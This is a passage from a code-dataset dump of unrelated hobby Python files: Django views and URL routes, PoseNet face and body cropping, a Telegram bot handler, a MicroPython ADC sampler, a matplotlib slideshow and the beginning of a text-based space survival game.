logger.info(f\"Load successful\")\n\n\ndef teardown(bot):\n logger.info(f\"Unloading...\")\n try:\n bot.remove_cog(\"RoRec\")\n except Exception as e:\n logger.error(f\"Error unloading: {e}\")\n else:\n logger.info(f\"Unload successful\")\n","repo_name":"flifloo/Administrator-py","sub_path":"extensions/rorec.py","file_name":"rorec.py","file_ext":"py","file_size_in_byte":12586,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"39728379980","text":"#!/usr/bin/env python3\n#\n#euler145 / how many reversible numbers are there below one-billion? 
\ndef isnotreversible(n):\n s=str(n)\n r=s[::-1]\n q=int(s)+int(r)\n for j in str(q):\n if j not in ('1','3','5','7','9'):\n return True\n if s[0]!='0'and r[0]!='0':\n return False\n else:\n return True\n\nseuil=10**9\nrev=0\nfor i in range(1,seuil):\n if isnotreversible(i)==False:\n rev+=1\n\nprint(rev, i)\n \n\n","repo_name":"allagonne/Euler_project","sub_path":"euler145bis.py","file_name":"euler145bis.py","file_ext":"py","file_size_in_byte":450,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"35414873475","text":"# -*- coding: utf-8 -*-\nfrom django.conf.urls import url\n\nfrom ad.views import *\n\nurlpatterns = [\n url(r'^get_ad_policy/$', get_ad_policy_view, name=\"get_ad_policy\"),\n url(r'^get_gold_config/$', get_gold_config_view, name=\"get_gold_config\"),\n url(r'^get_shield_config/$', get_shield_config_view, name=\"get_shield_config\"),\n url(r'^need_shield/$', need_shield_view, name=\"need_shield\"),\n url(r'^get_exchange_rate/$', get_exchange_rate_view, name=\"get_exchange_rate\"),\n url(r'^get_reward_cycle/$', get_reward_cycle_view, name=\"get_reward_cycle\"),\n url(r'^get_reward_cycle_count/$', get_reward_cycle_count_view, name=\"get_reward_cycle_count\"),\n url(r'^get_reward_condition/$', get_reward_condition_view, name=\"get_reward_condition\"),\n\n url(r'^get_ad_config/$', get_ad_config_view, name=\"get_ad_config_view\")\n]\n","repo_name":"echoturing/make_money","sub_path":"ad/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":834,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"72366679529","text":"import posenet\nimport math\nimport numpy as np\nimport cv2\nimport custom\n\n\n# Get the coordinate that describe the torso\ndef get_info_skeleton(pose_id, keypoint_scores, keypoint_coords, part_names):\n total_info = dict()\n for ki, (score, coord) in enumerate(zip(keypoint_scores[pose_id, :], keypoint_coords[pose_id, :, :])):\n for part_name in part_names:\n if posenet.PART_NAMES[ki] == part_name:\n total_info[part_name] = dict()\n total_info[part_name]['x'] = coord[1]\n total_info[part_name]['y'] = coord[0]\n total_info[part_name]['score'] = score\n return total_info\n\n\n# Get the pose id of the skeleton which is the most centered on the picture\ndef get_pose_id_closest_to_center(keypoint_scores, keypoint_coords, window_height, window_width):\n nb_pose = len(keypoint_scores)\n list_center_gravity = [[0 for x in range(2)] for y in range(nb_pose)]\n for pose_id in range(nb_pose):\n for ki, (score, coord) in enumerate(zip(keypoint_scores[pose_id, :], keypoint_coords[pose_id, :, :])):\n list_center_gravity[pose_id][1] = np.average(coord[1])\n list_center_gravity[pose_id][0] = np.average(coord[0])\n\n x_center = window_width / 2\n y_center = window_height / 2\n list_dist_center = np.zeros(nb_pose)\n for pose_id in range(nb_pose):\n list_dist_center[pose_id] = \\\n np.power(list_center_gravity[pose_id][1] - x_center, 2) + \\\n np.power(list_center_gravity[pose_id][0] - y_center, 2)\n\n return np.argmin(list_dist_center)\n\n\n# Create a square out of the different coordinate\ndef create_square(xmin, xmax, ymin, ymax, scale):\n square = [int(xmin),\n int(ymin),\n int(xmax - xmin),\n int(ymax - ymin)]\n square[0] -= int((square[2] * scale - square[2]) / 2)\n square[1] -= int((square[3] * scale - square[3]) / 2)\n square[2] = int(square[2] * scale)\n square[3] = int(square[3] * scale)\n\n return square\n\n\n# Create and crop the image only if 
the square is valid\ndef crop_image(square, image):\n    cropped_image = image\n    if square[2] > 0 and square[3] > 0:\n        cropped_image = image[\n            square[1]: square[1] + square[3],\n            square[0]: square[0] + square[2]]\n\n    return cropped_image\n\n\n# get the height of the face based on the eyes\ndef get_height_face(x_left_eye, x_right_eye):\n    distance_eyes = x_left_eye - x_right_eye\n    height_face = math.pi * distance_eyes\n\n    return height_face\n\n\n# Crop the body from a posenet skeleton\ndef get_body(pose_id, keypoint_scores, keypoint_coords, image):\n    parts_names = ['leftShoulder', 'rightShoulder', 'leftHip', 'rightHip']\n\n    parts_info = get_info_skeleton(pose_id, keypoint_scores, keypoint_coords, parts_names)\n\n    x_min = min(parts_info['leftShoulder']['x'], parts_info['rightShoulder']['x'],\n                parts_info['leftHip']['x'], parts_info['rightHip']['x'])\n    x_max = max(parts_info['leftShoulder']['x'], parts_info['rightShoulder']['x'],\n                parts_info['leftHip']['x'], parts_info['rightHip']['x'])\n    y_min = min(parts_info['leftShoulder']['y'], parts_info['rightShoulder']['y'],\n                parts_info['leftHip']['y'], parts_info['rightHip']['y'])\n    y_max = max(parts_info['leftShoulder']['y'], parts_info['rightShoulder']['y'],\n                parts_info['leftHip']['y'], parts_info['rightHip']['y'])\n\n    square = create_square(x_min, x_max, y_min, y_max, 1.3)\n\n    return crop_image(square, image)\n\n\n# Crop the face from a posenet skeleton\ndef get_face(pose_id, keypoint_scores, keypoint_coords, image):\n    parts_names = ['leftEar', 'rightEar', 'leftEye', 'rightEye']\n\n    parts_info = get_info_skeleton(pose_id, keypoint_scores, keypoint_coords, parts_names)\n\n    x_min = parts_info['rightEar']['x']\n    x_max = parts_info['leftEar']['x']\n    y_min = parts_info['leftEye']['y'] - get_height_face(parts_info['leftEye']['x'], parts_info['rightEye']['x']) / 2\n    y_max = parts_info['leftEye']['y'] + get_height_face(parts_info['leftEye']['x'], parts_info['rightEye']['x']) / 2\n\n    square = create_square(x_min, x_max, y_min, y_max, scale=1)\n\n    return crop_image(square, image)\n\n\n# Crop the forehead from a posenet skeleton\ndef get_forehead(pose_id, keypoint_scores, keypoint_coords, image):\n    parts_names = ['leftEye', 'rightEye']\n    parts_info = get_info_skeleton(pose_id, keypoint_scores, keypoint_coords, parts_names)\n\n    face_height = get_height_face(parts_info['leftEye']['x'], parts_info['rightEye']['x'])\n\n    top_forehead = parts_info['leftEye']['y'] - face_height / 2\n    bottom_forehead = max(parts_info['rightEye']['y'], parts_info['leftEye']['y'])\n    y_min = top_forehead + abs(bottom_forehead - top_forehead)/2\n    y_max = bottom_forehead - abs(bottom_forehead - top_forehead)/3\n    x_min = parts_info['rightEye']['x']\n    x_max = parts_info['leftEye']['x']\n    square = create_square(x_min, x_max, y_min, y_max, scale=1)\n    return crop_image(square, image)\n\n\n# Crop the full person from a posenet skeleton\ndef get_person(pose_id, keypoint_scores, keypoint_coords, image):\n    parts_names = ['nose', 'leftEye', 'rightEye', 'leftEar', 'rightEar', 'leftShoulder', 'rightShoulder',\n                   'leftElbow', 'rightElbow', 'leftWrist', 'rightWrist', 'leftHip', 'rightHip', 'leftKnee',\n                   'rightKnee', 'leftAnkle', 'rightAnkle']\n\n    parts_info = get_info_skeleton(pose_id, keypoint_scores, keypoint_coords, parts_names)\n\n    x_min = min(info['x'] for info in parts_info.values())\n    x_max = max(info['x'] for info in parts_info.values())\n    y_min = min(info['y'] for info in parts_info.values())\n    y_max = max(info['y'] for info in parts_info.values())\n\n    square = create_square(x_min, x_max, y_min, y_max, scale=1)\n\n    return crop_image(square, image)\n\n\n# Crop the mouth from a 
posenet skeleton\ndef get_mouth(pose_id, keypoint_scores, keypoint_coords, image):\n parts_names = ['nose', 'leftEar', 'rightEar', 'leftEye', 'rightEye']\n parts_info = get_info_skeleton(pose_id, keypoint_scores, keypoint_coords, parts_names)\n\n y_max = parts_info['leftEye']['y'] + get_height_face(parts_info['leftEye']['x'], parts_info['rightEye']['x']) / 2\n y_min = parts_info['nose']['y'] + np.abs(y_max - parts_info['nose']['y']) / 2\n x_min = parts_info['rightEar']['x'] + np.abs(parts_info['leftEar']['x'] - parts_info['rightEar']['x']) / 3\n x_max = parts_info['leftEar']['x'] - np.abs(parts_info['leftEar']['x'] - parts_info['rightEar']['x']) / 3\n square = create_square(x_min, x_max, y_min, y_max, scale=1)\n return crop_image(square, image)\n\n\n# Crop the left eye from a posenet skeleton\ndef get_left_eye(pose_id, keypoint_scores, keypoint_coords, image):\n parts_names = ['leftEye', 'rightEye']\n\n parts_info = get_info_skeleton(pose_id, keypoint_scores, keypoint_coords, parts_names)\n\n btw_eyes = parts_info['leftEye']['x']-parts_info['rightEye']['x']\n\n x_min = parts_info['leftEye']['x']-(btw_eyes*0.1)\n x_max = parts_info['leftEye']['x']+(btw_eyes*0.1)\n y_min = parts_info['leftEye']['y']-(btw_eyes*0.05)\n y_max = parts_info['leftEye']['y']+(btw_eyes*0.05)\n\n square = create_square(x_min, x_max, y_min, y_max, scale=1.5)\n\n return crop_image(square, image)\n\n\n# Crop the right eye from a posenet skeleton\ndef get_right_eye(pose_id, keypoint_scores, keypoint_coords, image):\n parts_names = ['leftEye', 'rightEye']\n\n parts_info = get_info_skeleton(pose_id, keypoint_scores, keypoint_coords, parts_names)\n\n btw_eyes = parts_info['leftEye']['x']-parts_info['rightEye']['x']\n\n x_min = parts_info['rightEye']['x']-(btw_eyes*0.1)\n x_max = parts_info['rightEye']['x']+(btw_eyes*0.1)\n y_min = parts_info['rightEye']['y']-(btw_eyes*0.05)\n y_max = parts_info['rightEye']['y']+(btw_eyes*0.05)\n\n square = create_square(x_min, x_max, y_min, y_max, scale=1.5)\n\n return crop_image(square, image)\n\n\n# Check if the hand is near the throat on a posenet skeleton\ndef is_hand_near_throat(pose_id, keypoint_scores, keypoint_coords):\n # Extract all information used for the detection\n parts_names = ['leftShoulder', 'rightShoulder', 'leftElbow', 'rightElbow', 'leftWrist', 'rightWrist']\n parts_info = get_info_skeleton(pose_id, keypoint_scores, keypoint_coords, parts_names)\n\n # get the best elbow and shoulder point\n if parts_info['leftShoulder']['score'] > parts_info['rightShoulder']['score']:\n y_shoulder = parts_info['leftShoulder']['y']\n else:\n y_shoulder = parts_info['rightShoulder']['y']\n\n if parts_info['leftElbow']['score'] > parts_info['rightElbow']['score']:\n y_elbow = parts_info['leftElbow']['y']\n else:\n y_elbow = parts_info['rightElbow']['y']\n\n # get the best valid wrist point\n if parts_info['leftWrist']['y'] < y_elbow and parts_info['rightWrist']['y'] < y_elbow:\n if parts_info['leftWrist']['score'] > parts_info['rightWrist']['score']:\n y_wrist = parts_info['leftWrist']['y']\n else:\n y_wrist = parts_info['rightWrist']['y']\n elif parts_info['leftWrist']['y'] < y_elbow:\n y_wrist = parts_info['leftWrist']['y']\n elif parts_info['rightWrist']['y'] < y_elbow:\n y_wrist = parts_info['rightWrist']['y']\n else:\n return False\n\n if np.abs(y_shoulder - y_wrist) > np.abs(y_elbow - y_wrist):\n return False\n\n return True\n\n\n# Check if the mouth is open based on a posenet skeleton\ndef is_mouth_open(pose_id, keypoint_scores, keypoint_coords, image):\n image_mouth = 
get_mouth(pose_id, keypoint_scores, keypoint_coords, image)\n\n hsv = cv2.cvtColor(image_mouth, cv2.COLOR_BGR2HSV)\n average_value = np.average(hsv[:, :, 2])\n\n image_face = get_face(pose_id, keypoint_scores, keypoint_coords, image)\n base_value = custom.image_treatment.get_average_value(image_face)\n\n if np.abs(base_value - average_value) > 15:\n return True\n else:\n return False\n\n\n# Check if one or more eyes are open\ndef are_eyes_open(pose_id, keypoint_scores, keypoint_coords, image):\n image_left_eye = custom.detection.get_left_eye(pose_id, keypoint_scores, keypoint_coords, image)\n image_right_eye = custom.detection.get_right_eye(pose_id, keypoint_scores, keypoint_coords, image)\n\n med = int(image_left_eye.shape[0]/2)\n\n hsvL = cv2.cvtColor(image_left_eye, cv2.COLOR_BGR2HSV)\n hsvR = cv2.cvtColor(image_right_eye, cv2.COLOR_BGR2HSV)\n hueL, satL, valL = cv2.split(hsvL)\n hueR, satR, valR = cv2.split(hsvR)\n whiteL = whiteR = 0\n\n for i in range(hueL.shape[1]):\n if hueL[med][i] > 40:\n whiteL = whiteL+1\n if hueR[med][i] > 40:\n whiteR = whiteR+1\n\n if whiteL > 1 or whiteR > 1:\n return True\n else:\n return False\n\n\n# Create a dictionary of symptoms\ndef create_symptoms_dict():\n symptoms = dict()\n symptoms[\"hand_near_throat\"] = 0.\n symptoms[\"eyes_close\"] = 0.\n symptoms[\"mouth_open\"] = 0.\n symptoms[\"laying_on_ground\"] = 0.\n symptoms[\"fast_cardiac_pace\"] = 0.\n symptoms[\"no_cardiac_pace\"] = 0.\n return symptoms\n\n\n# Get the diagnostic of a person based on his symptoms\n# Each symptoms should be a percentage\ndef get_diagnostics(symptoms):\n\t# No cardiac pace detection, so we don't do the cardiac diagnostic\n\t# We also don't take into account the fast and no cardiac pace symptoms\n diagnostic = dict()\n diagnostic[\"Etouffement\"] = \\\n (symptoms[\"hand_near_throat\"] + symptoms[\"mouth_open\"] + (1 - symptoms[\"eyes_close\"]) +\n + (1 - symptoms[\"laying_on_ground\"])) / 4\n #(symptoms[\"hand_near_throat\"] + symptoms[\"mouth_open\"] + (1 - symptoms[\"eyes_close\"]) +\n # symptoms[\"fast_cardiac_pace\"] + (1 - symptoms[\"laying_on_ground\"])) / 5\n\n diagnostic[\"Inconscient\"] = \\\n (symptoms[\"eyes_close\"] + symptoms[\"laying_on_ground\"]) / 2\n #(symptoms[\"eyes_close\"] + symptoms[\"laying_on_ground\"] +\n # (1 - symptoms[\"fast_cardiac_pace\"] + 1 - symptoms[\"no_cardiac_pace\"])) / 5\n\n #diagnostic[\"Arret_cardiaque\"] = \\\n # ((1 - symptoms[\"eyes_close\"]) + symptoms[\"laying_on_ground\"] + symptoms[\"no_cardiac_pace\"]) / 5\n\n # To differentiate these two, ask the user if the person is hurt\n #diagnostic[\"Malaise_cardiaque\"] = \\\n # ((1 - symptoms[\"eyes_close\"]) + 1 + 1) / 5 # (+ 1 whatever position) (+ 1 whatever cardiac pace)\n\n diagnostic[\"Saignement\"] = \\\n \t((1 - symptoms[\"eyes_close\"]) + 1) / 5 # (+ 1 whatever position)\n #((1 - symptoms[\"eyes_close\"]) + symptoms[\"fast_cardiac_pace\"] + 1) / 5 # (+ 1 whatever position)\n\n return diagnostic\n","repo_name":"DeLm0re/PLScare","sub_path":"source/custom/detection.py","file_name":"detection.py","file_ext":"py","file_size_in_byte":12498,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"13360526607","text":"import argparse\nimport os\nimport pickle\n\n\nclass MusicLists(dict):\n def __init__(self, file=None):\n super(MusicLists, self).__init__()\n\n self.file = file\n\n if os.path.exists(file) and os.path.getsize(file) > 0:\n with open(file, 'rb') as f:\n dic = pickle.load(f)\n self.update(dic)\n\n\n def 
addSong(self, tags, url):\n tags.append('songs')\n for l in tags:\n if l not in self:\n self[l] = list()\n if url not in self[l]:\n self[l].append(url)\n\n def removeSong(self, tags, url):\n if tags is None:\n tags = self.keys()\n\n for l in tags:\n if url in self[l]:\n self[l].remove(url)\n if len(self[l]) == 0:\n del self[l]\n\n def saveSong(self):\n with open(self.file, 'wb') as f:\n pickle.dump(self, f)\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n parser.add_argument('-m', '--mode', type=str, help='set action mode, [add, remove, clear]', required=True)\n parser.add_argument('-t', '--tags', nargs='*', type=str, help='set tags for the song')\n parser.add_argument('-id', '--url_id', type=str, help='youtube url ID', required=True)\n args = parser.parse_args()\n\n m = MusicLists('playlist.p')\n\n if args.mode == 'add':\n m.addSong(args.tags, args.url_id)\n elif args.mode == 'remove':\n m.removeSong(args.tags, args.url_id)\n else:\n print('only \"add\" or \"remove\" is acceptable mode')\n\n m.saveSong()\n\n print('current playlist: {}'.format(m))\n","repo_name":"jayzhan211/MusicBox","sub_path":"playlist.py","file_name":"playlist.py","file_ext":"py","file_size_in_byte":1619,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"71642183527","text":"from django.shortcuts import render, redirect, get_object_or_404\nfrom django.urls import reverse_lazy\nfrom django.contrib.auth.views import LoginView, PasswordResetView, PasswordChangeView\nfrom django.contrib import messages\nfrom django.contrib.messages.views import SuccessMessageMixin\nfrom django.views import View\nfrom django.contrib.auth.decorators import login_required\nfrom django.db.models import OuterRef, Subquery\nfrom .models import *\nfrom .forms import * #RegisterForm, LoginForm,TeamSiteForm, UpdateUserForm, UpdateProfileForm, CreateTeamForm,EditTeamForm, DeleteTeamForm\n# from django import template\n# register = template.Library()\nimport smtplib\nfrom django.template.loader import render_to_string\nfrom django.utils.html import strip_tags\nfrom email.mime.text import MIMEText\nfrom email.mime.multipart import MIMEMultipart\nfrom datetime import datetime\n\n@login_required\ndef TeamRosterView(request,id):\n \n if(request.method == 'GET'):\n teamID = get_object_or_404(Team, TeamID=id)\n teamRosters = TeamRoster.objects.filter(Team_id=id).all()\n teamRosterForm = TeamRosterForm()\n return render(request, 'teams/players/TeamRoster.html', {'TeamRoster': teamRosters, 'Team_Roster_Form': teamRosterForm})\n elif (request.method == 'POST'):\n team = get_object_or_404(Team, TeamID=id)\n form = TeamRosterForm(request.POST, files = request.FILES)\n if(form.is_valid()):\n newRoster = form.save(commit=False)\n newRoster.Team = team\n newRoster.save()\n msg = \"Player has been added.\"\n messages.success(request, msg)\n return redirect(to='team-rosters', id=id)\n else:\n teamRosterForm = TeamRosterForm(request.POST, files = request.FILES, instance=teamID)\n return render(request, 'teams/players/TeamRoster.html', {'TeamRoster': teamRosters, 'Team_Roster_Form': form})\n\n@login_required\ndef EditTeamRosterView(request,id):\n \n if(request.method == 'GET'):\n player = get_object_or_404(TeamRoster, TeamPlayerID=id)\n teamID = player.Team.TeamID\n teamRosterForm = TeamRosterForm(instance=player)\n return render(request, 'teams/players/EditRosterPlayer.html', {'Team_Roster_Form': teamRosterForm, 'TeamID': teamID})\n elif (request.method == 'POST'):\n player = 
get_object_or_404(TeamRoster, TeamPlayerID=id)\n form = TeamRosterForm(request.POST, files = request.FILES, instance=player)\n if(form.is_valid()):\n newRoster = form.save(commit=True)\n newRoster.Team.TeamID\n msg = \"Player has been updated.\"\n messages.success(request, msg)\n return redirect(to='team-rosters', id=newRoster.Team.TeamID)\n else:\n teamRosterForm = TeamRosterForm(instance=player)\n return render(request, 'teams/players/EditRosterPlayer.html', {'Team_Roster_Form': teamRosterForm})\n \n@login_required\ndef DeleteTeamRosterView(request,id):\n \n if(request.method == 'GET'):\n player = get_object_or_404(TeamRoster, TeamPlayerID=id)\n teamID = player.Team.TeamID \n teamRosterForm = TeamRosterForm(instance=player)\n return render(request, 'teams/players/DeleteRosterPlayer.html', {'PlayerFullName': player.FullName, \"TeamID\": teamID})\n elif (request.method == 'POST'):\n player = get_object_or_404(TeamRoster, TeamPlayerID=id)\n TeamRoster.objects.filter(TeamPlayerID=player.TeamPlayerID).delete()\n teamID = player.Team.TeamID\n msg = \"Player has been deleted.\"\n messages.success(request, msg)\n return redirect(to='team-rosters', id=teamID)\n","repo_name":"brandonmichaelhunter/DevToLindoChallenge","sub_path":"users/teamroster_views.py","file_name":"teamroster_views.py","file_ext":"py","file_size_in_byte":3701,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"11939334984","text":"import pyb\nimport utime\nimport array\nimport task_share\n\nimport micropython\nmicropython.alloc_emergency_exception_buf(100)\n\n## The input pin for the Nucleo. \npc0 = pyb.Pin(pyb.Pin.board.PC0, pyb.Pin.OUT_PP)\n## The output pin for the Nucleo. \npc1 = pyb.Pin(pyb.Pin.board.PC1, pyb.Pin.OUT_PP)\n## Variable reading from the ADC.\nadc = pyb.ADC(pc0)\n\n## Instantiation of Encoder 2 reading shared variable.\nqueue = task_share.Queue ('h', 1000, thread_protect = False, overwrite = False,\n name = \"adcreading\")\n\n## Array storing time data.\ntime_list = array.array(\"f\", [0] * int(1002))\n\nqueue.clear()\n\n## Index to iterate through arrays\nruns = 0\n\n## Start time variable.\nstart_time = utime.ticks_ms()\n\ndef interrupts(tim):\n \"\"\"!\n Interrupt callback function.\n @param tim Timer object used for interrupts\n \"\"\"\n global runs\n \n if runs <= 1000:\n# adc.read()\n queue.put(adc.read(), in_ISR = True)\n ## Index time variable\n g_time = utime.ticks_ms()\n ## Time data list\n time_list[runs] = utime.ticks_diff(g_time, start_time)\n runs += 1\n else:\n pc1.low()\n tim.callback(None)\n \n \nif __name__ == \"__main__\":\n ## Timer object used for interrupts.\n tim = pyb.Timer(1, freq=500)\n pc1.high()\n tim.callback(interrupts)\n ## Index variable\n idx = 0\n while idx <= 1000:\n ## Voltage data variable\n pos = queue.get()\n print('{:},{:}'.format(time_list[idx], pos))\n idx += 1\n \n","repo_name":"nishkachawla/me405_lab4","sub_path":"src/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1523,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"14346535349","text":"from keyboard import admin\r\nfrom function.bot_and_db.bot_and_db import bot\r\nfrom function.bot_and_db.bot_and_db import db\r\n\r\n\r\n\r\n\r\n# Получаем id пользователя\r\ndef user_information(message):\r\n\tuser_id = message.text\r\n\r\n\tif user_id != \"Отменить\":\r\n\r\n\t\tname, link, balance, black = db.my_profil(user_id)\r\n\r\n\t\tif str(name) != 
\"Error\":\r\n\t\t\tbot.send_message(\r\n\t\t\t\tmessage.from_user.id,\r\n\t\t\t\t\"ID: \" + str(user_id) +\r\n\t\t\t\t\"\\nИмя: \" + str(name) +\r\n\t\t\t\t\"\\nСсылка: @\" + str(link) +\r\n\t\t\t\t\"\\nБаланс: \" + str(balance) +\r\n\t\t\t\t\"\\nБан: \" + str(black),\r\n\t\t\t\treply_markup=admin.btn_admin_user)\r\n\r\n\t\telif str(name) == \"Error\":\r\n\t\t\tbot.send_message(message.from_user.id, \"Прозошла ошибка, пользователь не найден\", reply_markup=admin.btn_admin_user)\r\n\r\n\t\telse:\r\n\t\t\tpass\r\n\r\n\telif user_id == \"Отменить\":\r\n\t\tbot.send_message(message.from_user.id, \"Вы отменили действие бана\", reply_markup=admin.btn_admin_user)","repo_name":"GarikSukiasyan/bot_telegram_template","sub_path":"function/admin/info_user.py","file_name":"info_user.py","file_ext":"py","file_size_in_byte":995,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"44183049632","text":"from django.urls import path, include\nfrom game.views.setting.getinfo import InfoView\nfrom game.views.setting.register import PlayerView\nfrom rest_framework_simplejwt.views import (\n TokenObtainPairView,\n TokenRefreshView,\n)\n\n\nurlpatterns = [\n path(\"token/\", TokenObtainPairView.as_view(), name=\"setting_token\"),\n path(\"token/refresh/\", TokenRefreshView.as_view(),\n name=\"setting_token_refresh\"),\n path(\"getinfo/\", InfoView.as_view(), name=\"setting_getinfo\"),\n path(\"register/\", PlayerView.as_view(), name=\"setting_register\"),\n path(\"qq_login/\", include(\"game.urls.setting.qq_login.index\")),\n]\n","repo_name":"666hsy/app","sub_path":"game/urls/setting/index.py","file_name":"index.py","file_ext":"py","file_size_in_byte":623,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"18516933808","text":"import os, cv2\r\nimport numpy as np\r\nimport matplotlib as mpl\r\nimport matplotlib.pyplot as plt\r\nfrom matplotlib.gridspec import GridSpec\r\n\r\n_projectDirectory = os.path.dirname(__file__)\r\n_imagesDirectory = os.path.join(_projectDirectory, \"images\")\r\n\r\n#record all the images inside _imageDirectory folder into a list\r\n_images = []\r\nfor _root, _dirs, _files in os.walk(_imagesDirectory):\r\n\tfor _file in _files:\r\n\t\tif _file.endswith(\".jpg\"):\r\n\t\t\t_images.append(_imagesDirectory + \"\\\\\" + _file)\r\n\r\n_imageIndex = 0\r\n_imageTotal = len(_images)\r\n\r\n#prepare the figure\r\n#mpl.rcParams['toolbar'] = 'None' #disable matplotlib toolbar\r\n_fig = plt.figure(\"Image Slideshow\")\r\n_gs = GridSpec(3, 3)\r\n_fig1 = plt.subplot(_gs[0:3, 0:3])\r\n\r\n#initialize the figure with first image in the list\r\n_img = cv2.imread(_images[_imageIndex], cv2.IMREAD_UNCHANGED)\r\n_imgShow = cv2.cvtColor(_img, cv2.COLOR_BGR2RGB) #for displaying purpose\r\n_imgShowIt = plt.imshow(_imgShow)\r\n\r\ndef _changeImage(event):\r\n\tglobal _imageIndex #global is needed if we want to assign a value to the global variable\r\n\t_imageIndex += 1\r\n\tif _imageIndex == _imageTotal: #no global needed if we just want to read the value of global variable\r\n\t\t_imageIndex = 0\r\n\t_img = cv2.imread(_images[_imageIndex], cv2.IMREAD_UNCHANGED) #this syntax doesn't refer to global variable\r\n\t_imgShow = cv2.cvtColor(_img, cv2.COLOR_BGR2RGB) #for displaying purpose, also this syntax doesn't refer to global variable\r\n\t_imgShowIt.set_array(_imgShow) #modify the data inside global object, no global needed since we use the object's method\r\n\tplt.draw()\r\n\t\r\n_cid = 
_fig.canvas.mpl_connect('button_press_event', _changeImage) #record the connection id, so we can disconnect the callback later\r\n\r\nplt.xticks([]), plt.yticks([]) #hide tick values on X and Y axis\r\nplt.tight_layout()\r\nplt.show()\r\n","repo_name":"ideaspaper/PythonCodes","sub_path":"matplotlibExcercise/imageSlideShow/imageSlideShow.py","file_name":"imageSlideShow.py","file_ext":"py","file_size_in_byte":1817,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"8962489482","text":"from django.shortcuts import render\n\nfrom django.contrib.auth.decorators import login_required, permission_required\n\n# Create your views here.\n\n\n# lihat can_edit di models\n# @permission_required('blog_can_edit')\ndef updateView(request):\n context ={\n 'page_title':'edit Artikel',\n }\n return render(request, 'blog/edit.html', context)\n# untuk permision sendiri/peruser jika di user masuuk blog|add\n@permission_required('blog.add_artikel')\n\n# melakukan forbiden terhadap user yg tidakbisa mengakses\n# bisa double\n@login_required\n@permission_required('blog.add_edit', login_url=None, raise_exception=True)\n\n# diawal akan masuk ke login\n# @permission_required('blog.add_artikel', login_url='/admin/')\ndef addView(request):\n context ={\n 'page_title':'Add Artikel',\n }\n return render(request, 'blog/add.html', context)\n\ndef indexView(request):\n print(request.user.get_all_permissions())\n context ={\n 'page_title':'Blog',\n }\n return render(request, 'blog/index.html', context )\n","repo_name":"Imamabdulfatah/Belajar-DjangoPython","sub_path":"31. permisionRequirement/django/blog/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1021,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"7793052330","text":"from Window import Window\nfrom constants import ComputedConstants\nfrom cell import Cell\n\nwindow = Window(6000, 1e5, 300, 4000, 12000, 200,resX=300,resY=900)\n\n\nComputedConstants.decoloringRatio = 0.85 # speed at which colors return to black after collision (0: instant, 0.5, after two/three frames, 1 never)\nwindow.nStep = 2 # two time step by frame\n\n\ndef newAdvect(self):\n self.coords.xs += self.coords.vxs * ComputedConstants.dt\n self.coords.ys += self.coords.vys * ComputedConstants.dt\n self.coords.vys += -9.81 * ComputedConstants.dt\n\n\nCell.advect = newAdvect\n\nwindow.run()\n\n\n","repo_name":"mbrebion/pythonParticle","sub_path":"animations/fluidStatic.py","file_name":"fluidStatic.py","file_ext":"py","file_size_in_byte":590,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"53"} +{"seq_id":"14815994081","text":"#!/usr/bin/python3\nimport os\n# Replace RPG starter project with this code when new instructions are live\nos.system(\"clear\")\nprint('PARHELION: A SPACE SURVIVAL GAME')\nname = input('Enter your name?')\n\ndef showInstructions():\n #print a main menu and the commands\n print(\"\"\"\n========\nYou are a junior engineer aboard the Parhelion, bound towards a deep space terraforming \ncolony. After the Parhelion escapes orbit, you enter your autohomeostasis pod to spend a \nmajority of the trip in peaceful sleep. You awaken groggily as the emergency awaken injects you with the combination of restoratives, and your pod cracks open slightly. The stinging\nacrid smell of burnt metal seeps into your pod. If you push your pod door, you can\nprobably free yourself from the pod. 
\"\"\")\n input(\"Try, 'push pod'\")\n\n print(\"\"\"\nAs you push the pod open, the wristband of\nyour bodysuit flashes, and you see the OXYGEN meter drop from 100% down to 99%.\nCommands:\n go [direction]\n get [item]\n look []\n examine [object]\n\"\"\")\n\ndef showStatus():\n #print the player's current status\n print('---------------------------')\n print('Oxygen saturation is at', oxy, '%')\n print('You are in the ' + currentRoom)\n #print the current inventory\n print('Inventory : ' + str(inventory))\n #print an item if there is one\n # if \"item\" in rooms[currentRoom]:\n # print('You see a ' + rooms[currentRoom]['item'])\n print(\"---------------------------\")\n\n#an inventory, which is initially empty\ninventory = []\nbody = int(3)\nskills = []\n\n#a dictionary linking a room to other rooms\n## A dictionary linking a room to other rooms\ndef objects(target):\n if currentRoom == 'Crew Stasis Bay 9':\n if target == 'console':\n print('its a console')\n elif target == 'pod':\n print('theres a tool under the pod')\n return 0\n elif room == 'passage':\n print('youre in a passage')\n return 0\n \n\n\nrooms = {\n\n 'Crew Stasis Bay 9' : {\n 'south' : 'P-Way',\n 'east' : 'Utility Locker',\n 'item' : 'L-tool',\n 'object' : {\n 'console',\n 'pod',\n },\n },\n\n 'P-Way' : {\n 'north' : 'Hall',\n 'south' : 'Bridge',\n 'item' : 'monster',\n },\n 'Utility Locker' : {\n 'west' : 'Hall',\n 'south': 'Garden',\n 'item' : 'potion',\n },\n 'Garden' : {\n 'north' : 'Dining Room'\n },\n 'Pantry' : {\n 'south' : 'Dining 